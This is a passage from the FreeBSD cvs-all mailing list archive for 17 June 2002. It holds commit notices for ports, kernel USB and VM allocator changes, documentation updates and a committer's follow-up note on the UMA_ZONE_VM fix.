Tsuguru Revision Changes Path 1.3 +2 -2 ports/graphics/swftools/Makefile 1.3 +1 -1 ports/graphics/swftools/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:44:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F3AD737B404; Mon, 17 Jun 2002 13:44:18 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKiIv26395; Mon, 17 Jun 2002 13:44:18 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172044.g5HKiIv26395@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:44:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/pngquant Makefile ports/graphics/pngquant/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:44:18 PDT Modified files: graphics/pngquant Makefile Removed files: graphics/pngquant/files patch-aa Log: Support CFLAGS/LOCALBASE properly PR: 39433 Submitted by: Ports Fury Revision Changes Path 1.3 +8 -4 ports/graphics/pngquant/Makefile 1.2 +0 -22 ports/graphics/pngquant/files/patch-aa (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:45: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1A9A437B437; Mon, 17 Jun 2002 13:44:38 -0700 (PDT) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKica26492; Mon, 17 Jun 2002 13:44:38 -0700 (PDT) (envelope-from n_hibma) Message-Id: <200206172044.g5HKica26492@freefall.freebsd.org> From: Nick Hibma Date: Mon, 17 Jun 2002 13:44:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/usb umass.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG n_hibma 2002/06/17 13:44:37 PDT Modified files: sys/dev/usb umass.c Log: clean up some KASSERTS. Revision Changes Path 1.62 +18 -13 src/sys/dev/usb/umass.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:52:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A8A1837B406; Mon, 17 Jun 2002 13:52:11 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKqBb27647; Mon, 17 Jun 2002 13:52:11 -0700 (PDT) (envelope-from pat) Message-Id: <200206172052.g5HKqBb27647@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 13:52:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/blackbox pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 13:52:11 PDT Modified files: x11-wm/blackbox pkg-descr Log: Update WWW tag PR: 39420 Submitted by: Sergey A. Osokin Approved by: maintainer Revision Changes Path 1.10 +1 -1 ports/x11-wm/blackbox/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:52:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7A0D837B446; Mon, 17 Jun 2002 13:52:26 -0700 (PDT) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKqQQ27708; Mon, 17 Jun 2002 13:52:26 -0700 (PDT) (envelope-from n_hibma) Message-Id: <200206172052.g5HKqQQ27708@freefall.freebsd.org> From: Nick Hibma Date: Mon, 17 Jun 2002 13:52:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/usb usb_subr.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG n_hibma 2002/06/17 13:52:26 PDT Modified files: sys/dev/usb usb_subr.c Log: Set the ivars _after_ checking that the bdev was correctly created instead of before. Revision Changes Path 1.52 +2 -2 src/sys/dev/usb/usb_subr.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:57:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E13EF37B40C; Mon, 17 Jun 2002 13:57:15 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKvFO28187; Mon, 17 Jun 2002 13:57:15 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206172057.g5HKvFO28187@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Mon, 17 Jun 2002 13:57:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/17 13:57:15 PDT Modified files: net/samba Makefile pkg-plist Log: Fix package building as well as vfs module installation There are still more files that bento will complain about, but I don't have time to fix that immediately Noticed by: Udo.Schweigert@siemens.com Revision Changes Path 1.88 +5 -3 ports/net/samba/Makefile 1.35 +8 -5 ports/net/samba/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:58: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1099137B40B; Mon, 17 Jun 2002 13:57:55 -0700 (PDT) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKvtS28291; Mon, 17 Jun 2002 13:57:55 -0700 (PDT) (envelope-from n_hibma) Message-Id: <200206172057.g5HKvtS28291@freefall.freebsd.org> From: Nick Hibma Date: Mon, 17 Jun 2002 13:57:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/usb uhub.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG n_hibma 2002/06/17 13:57:54 PDT Modified files: sys/dev/usb uhub.c Log: Avoid reprobing on loading a driver. This does not work as the ivars set during the previous probe are stale. What really should be done is route the probe through device_probe_and_attach bit this is one of those ICBBATIASS (I can't be bothered as there is a simpler solution). The user can easily replug the device after kldloading a new device driver. Revision Changes Path 1.43 +15 -0 src/sys/dev/usb/uhub.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 14:21:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8DC8437B417; Mon, 17 Jun 2002 14:21:07 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HLL7Q35713; Mon, 17 Jun 2002 14:21:07 -0700 (PDT) (envelope-from glewis) Message-Id: <200206172121.g5HLL7Q35713@freefall.freebsd.org> From: Greg Lewis Date: Mon, 17 Jun 2002 14:21:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/clip Makefile distinfo pkg-plist ports/databases/clip/files patch-cliplibs::clip-com::Makefile patch-cliplibs::clip-fcgi::Makefile patch-cliplibs::clip-oasis::Makefile patch-cliplibs::clip-oasis::nanfor::Makefile patch-cliplibs::clip-oasis::netto::Makefile patch-cliplibs::clip-txtprn::Makefile patch-prg::udb::Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/17 14:21:07 PDT Modified files: databases/clip Makefile distinfo pkg-plist Added files: databases/clip/files patch-cliplibs::clip-com::Makefile patch-cliplibs::clip-fcgi::Makefile patch-cliplibs::clip-oasis::Makefile patch-cliplibs::clip-oasis::nanfor::Makefile patch-cliplibs::clip-oasis::netto::Makefile patch-cliplibs::clip-txtprn::Makefile patch-prg::udb::Makefile Log: Unbreak this port: . Update to 0.99-3 (0.96-1 is no longer available). . Fix MASTER_SITES. Revision Changes Path 1.3 +3 -6 ports/databases/clip/Makefile 1.2 +1 -1 ports/databases/clip/distinfo 1.1 +19 -0 ports/databases/clip/files/patch-cliplibs::clip-com::Makefile (new) 1.1 +10 -0 ports/databases/clip/files/patch-cliplibs::clip-fcgi::Makefile (new) 1.1 +20 -0 ports/databases/clip/files/patch-cliplibs::clip-oasis::Makefile (new) 1.1 +16 -0 ports/databases/clip/files/patch-cliplibs::clip-oasis::nanfor::Makefile (new) 1.1 +16 -0 ports/databases/clip/files/patch-cliplibs::clip-oasis::netto::Makefile (new) 1.1 +9 -0 ports/databases/clip/files/patch-cliplibs::clip-txtprn::Makefile (new) 1.1 +29 -0 ports/databases/clip/files/patch-prg::udb::Makefile (new) 1.3 +148 -47 ports/databases/clip/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 14:26:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A62437B40E; Mon, 17 Jun 2002 14:26:08 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HLQ8Z36175; Mon, 17 Jun 2002 14:26:08 -0700 (PDT) (envelope-from bmah) Message-Id: <200206172126.g5HLQ8Z36175@freefall.freebsd.org> From: "Bruce A. Mah" Date: Mon, 17 Jun 2002 14:26:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/releases/4.6R schedule.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/17 14:26:08 PDT Modified files: en/releases/4.6R schedule.sgml Log: Update 4.6-RELEASE schedule with all the items I know of, for posterity. Revision Changes Path 1.18 +5 -5 www/en/releases/4.6R/schedule.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 14:46:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4EDF537B42C; Mon, 17 Jun 2002 14:46:22 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HLkMi38188; Mon, 17 Jun 2002 14:46:22 -0700 (PDT) (envelope-from blackend) Message-Id: <200206172146.g5HLkMi38188@freefall.freebsd.org> From: Marc Fonvieille Date: Mon, 17 Jun 2002 14:46:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/share/sgml authors.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/17 14:46:22 PDT Modified files: en_US.ISO8859-1/share/sgml authors.ent Log: Add entity for my author name Approved by: keramida Revision Changes Path 1.232 +2 -0 doc/en_US.ISO8859-1/share/sgml/authors.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 14:49:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 91E5E37B406; Mon, 17 Jun 2002 14:49:06 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HLn6d38356; Mon, 17 Jun 2002 14:49:06 -0700 (PDT) (envelope-from blackend) Message-Id: <200206172149.g5HLn6d38356@freefall.freebsd.org> From: Marc Fonvieille Date: Mon, 17 Jun 2002 14:49:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/contributors article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/17 14:49:06 PDT Modified files: en_US.ISO8859-1/articles/contributors article.sgml Log: Remove myself from contributors. Add myself to committers. Approved by: keramida Revision Changes Path 1.206 +4 -4 doc/en_US.ISO8859-1/articles/contributors/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 14:50:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9514637B417; Mon, 17 Jun 2002 14:50:21 -0700 (PDT) Received: (from imp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HLoKk38718; Mon, 17 Jun 2002 14:50:20 -0700 (PDT) (envelope-from imp) Message-Id: <200206172150.g5HLoKk38718@freefall.freebsd.org> From: Warner Losh Date: Mon, 17 Jun 2002 14:50:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/mtree BSD.include.dist src/include Makefile src/usr.sbin/wicontrol wicontrol.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG imp 2002/06/17 14:50:20 PDT Modified files: (Branch: RELENG_4) etc/mtree BSD.include.dist include Makefile usr.sbin/wicontrol wicontrol.c Log: MFC: Finish merging the move from i386/isa -> dev/wi. Pointy-hat-to: Imp for not doing this before 4.6. Revision Changes Path 1.32.2.9 +3 -1 src/etc/mtree/BSD.include.dist 1.109.2.21 +3 -2 src/include/Makefile 1.9.2.6 +1 -1 src/usr.sbin/wicontrol/wicontrol.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 14:51:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C1F1C37B477; Mon, 17 Jun 2002 14:51:39 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HLpdg39069; Mon, 17 Jun 2002 14:51:39 -0700 (PDT) (envelope-from blackend) Message-Id: <200206172151.g5HLpdg39069@freefall.freebsd.org> From: Marc Fonvieille Date: Mon, 17 Jun 2002 14:51:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/news news.xml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/17 14:51:39 PDT Modified files: en/news news.xml Log: Announce myself as a new doc committer. Approved by: keramida Revision Changes Path 1.92 +11 -1 www/en/news/news.xml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 14:55: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1AE5E37B408; Mon, 17 Jun 2002 14:55:03 -0700 (PDT) Received: (from imp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HLt3I39289; Mon, 17 Jun 2002 14:55:03 -0700 (PDT) (envelope-from imp) Message-Id: <200206172155.g5HLt3I39289@freefall.freebsd.org> From: Warner Losh Date: Mon, 17 Jun 2002 14:55:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/include if_wavelan_ieee.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG imp 2002/06/17 14:55:03 PDT Removed files: (Branch: RELENG_4) sys/i386/include if_wavelan_ieee.h Log: MFC: This moved to dev/wi/if_wavelan_ieee.h Revision Changes Path 1.5.2.2 +0 -323 src/sys/i386/include/if_wavelan_ieee.h (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 15: 2:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A136837B43D; Mon, 17 Jun 2002 15:02:42 -0700 (PDT) Received: (from jeff@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HM2gC40310; Mon, 17 Jun 2002 15:02:42 -0700 (PDT) (envelope-from jeff) Message-Id: <200206172202.g5HM2gC40310@freefall.freebsd.org> From: Jeff Roberson Date: Mon, 17 Jun 2002 15:02:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys malloc.h src/sys/vm uma.h uma_core.c uma_int.h vm_map.c src/sys/i386/i386 pmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeff 2002/06/17 15:02:42 PDT Modified files: sys/sys malloc.h sys/vm vm_map.c uma_core.c uma_int.h uma.h sys/i386/i386 pmap.c Log: - Introduce the new M_NOVM option which tells uma to only check the currently allocated slabs and bucket caches for free items. It will not go ask the vm for pages. This differs from M_NOWAIT in that it not only doesn't block, it doesn't even ask. - Add a new zcreate option ZONE_VM, that sets the BUCKETCACHE zflag. This tells uma that it should only allocate buckets out of the bucket cache, and not from the VM. It does this by using the M_NOVM option to zalloc when getting a new bucket. This is so that the VM doesn't recursively enter itself while trying to allocate buckets for vm_map_entry zones. If there are already allocated buckets when we get here we'll still use them but otherwise we'll skip it. - Use the ZONE_VM flag on vm map entries and pv entries on x86. Revision Changes Path 1.323 +1 -1 src/sys/i386/i386/pmap.c 1.64 +1 -0 src/sys/sys/malloc.h 1.8 +1 -0 src/sys/vm/uma.h 1.28 +17 -3 src/sys/vm/uma_core.c 1.9 +1 -0 src/sys/vm/uma_int.h 1.253 +2 -1 src/sys/vm/vm_map.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 15:26:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9934637B407; Mon, 17 Jun 2002 15:26:34 -0700 (PDT) Received: (from gordon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HMNZs46517; Mon, 17 Jun 2002 15:23:35 -0700 (PDT) (envelope-from gordon) Message-Id: <200206172223.g5HMNZs46517@freefall.freebsd.org> From: Gordon Tetlow Date: Mon, 17 Jun 2002 15:23:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/pgpkeys chapter.sgml gordon.key pgpkeys.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gordon 2002/06/17 15:23:35 PDT Modified files: en_US.ISO8859-1/books/handbook/pgpkeys chapter.sgml pgpkeys.ent Added files: en_US.ISO8859-1/books/handbook/pgpkeys gordon.key Log: Add my key to the handbook. Revision Changes Path 1.158 +5 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/chapter.sgml 1.1 +76 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/gordon.key (new) 1.33 +1 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/pgpkeys.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 15:51:42 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.chesapeake.net (chesapeake.net [205.130.220.14]) by hub.freebsd.org (Postfix) with ESMTP id D264337B442; Mon, 17 Jun 2002 15:51:35 -0700 (PDT) Received: from localhost (jroberson@localhost) by mail.chesapeake.net (8.11.6/8.11.6) with ESMTP id g5HMlfP65811; Mon, 17 Jun 2002 18:47:41 -0400 (EDT) (envelope-from jroberson@chesapeake.net) Date: Mon, 17 Jun 2002 18:47:41 -0400 (EDT) From: Jeff Roberson To: Jeff Roberson Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/sys malloc.h src/sys/vm uma.h uma_core.c uma_int.h vm_map.c src/sys/i386/i386 pmap.c In-Reply-To: <200206172202.g5HM2gC40310@freefall.freebsd.org> Message-ID: <20020617184535.Q63891-100000@mail.chesapeake.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, 17 Jun 2002, Jeff Roberson wrote: > jeff 2002/06/17 15:02:42 PDT > > Modified files: > sys/sys malloc.h > sys/vm vm_map.c uma_core.c uma_int.h uma.h > sys/i386/i386 pmap.c > Log: > - Introduce the new M_NOVM option which tells uma to only check the currently > allocated slabs and bucket caches for free items. It will not go ask the vm > for pages. This differs from M_NOWAIT in that it not only doesn't block, it > doesn't even ask. > > - Add a new zcreate option ZONE_VM, that sets the BUCKETCACHE zflag. This > tells uma that it should only allocate buckets out of the bucket cache, and > not from the VM. It does this by using the M_NOVM option to zalloc when > getting a new bucket. This is so that the VM doesn't recursively enter > itself while trying to allocate buckets for vm_map_entry zones. If there > are already allocated buckets when we get here we'll still use them but > otherwise we'll skip it. > > - Use the ZONE_VM flag on vm map entries and pv entries on x86. > > Revision Changes Path > 1.323 +1 -1 src/sys/i386/i386/pmap.c > 1.64 +1 -0 src/sys/sys/malloc.h > 1.8 +1 -0 src/sys/vm/uma.h > 1.28 +17 -3 src/sys/vm/uma_core.c > 1.9 +1 -0 src/sys/vm/uma_int.h > 1.253 +2 -1 src/sys/vm/vm_map.c > This fixes several cases where vm_map recursion resulted in panics etc. The UMA_ZONE_VM flag should be added to the pv entry zone for every arch. If people don't mind me doing this without testing on everything other than x86 and alpha I'll do it myself. Thanks, Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 16:36: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 18ECA37B406; Mon, 17 Jun 2002 16:36:05 -0700 (PDT) Received: (from mita@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HNa5H62321; Mon, 17 Jun 2002 16:36:05 -0700 (PDT) (envelope-from mita) Message-Id: <200206172336.g5HNa5H62321@freefall.freebsd.org> From: Yoshio MITA Date: Mon, 17 Jun 2002 16:36:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/octave pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mita 2002/06/17 16:36:04 PDT Modified files: math/octave pkg-plist Log: I found a very small typo. (%D/octave.info instead of %D/info/octave.info) Revision Changes Path 1.27 +2 -2 ports/math/octave/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 16:54: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B60D37B423; Mon, 17 Jun 2002 16:53:59 -0700 (PDT) Received: (from jeff@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HNrxn64370; Mon, 17 Jun 2002 16:53:59 -0700 (PDT) (envelope-from jeff) Message-Id: <200206172353.g5HNrxn64370@freefall.freebsd.org> From: Jeff Roberson Date: Mon, 17 Jun 2002 16:53:58 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm uma_core.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeff 2002/06/17 16:53:58 PDT Modified files: sys/vm uma_core.c Log: Honor the BUCKETCACHE flag on free as well. Revision Changes Path 1.29 +9 -4 src/sys/vm/uma_core.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 16:58:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1566737B41F; Mon, 17 Jun 2002 16:58:47 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HNwlQ64630; Mon, 17 Jun 2002 16:58:47 -0700 (PDT) (envelope-from tjr) Message-Id: <200206172358.g5HNwlQ64630@freefall.freebsd.org> From: "Tim J. Robbins" Date: Mon, 17 Jun 2002 16:58:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/renice renice.8 renice.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/17 16:58:46 PDT Modified files: (Branch: RELENG_4) usr.bin/renice renice.8 renice.c Log: MFC: POSIX -n option, style changes, accept decimal user ID's as well as user names, diagnostics to stderr. renice.c revs. 1.7-1.16, renice.8 revs. 1.10-1.12 Revision Changes Path 1.5.2.5 +21 -22 src/usr.bin/renice/renice.8 1.4.2.3 +76 -32 src/usr.bin/renice/renice.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:10:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A5A8837B42A; Mon, 17 Jun 2002 17:10:09 -0700 (PDT) Received: (from kbyanc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0A9869933; Mon, 17 Jun 2002 17:10:09 -0700 (PDT) (envelope-from kbyanc) Message-Id: <200206180010.g5I0A9869933@freefall.freebsd.org> From: Kelly Yancey Date: Mon, 17 Jun 2002 17:10:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/netstat route.c 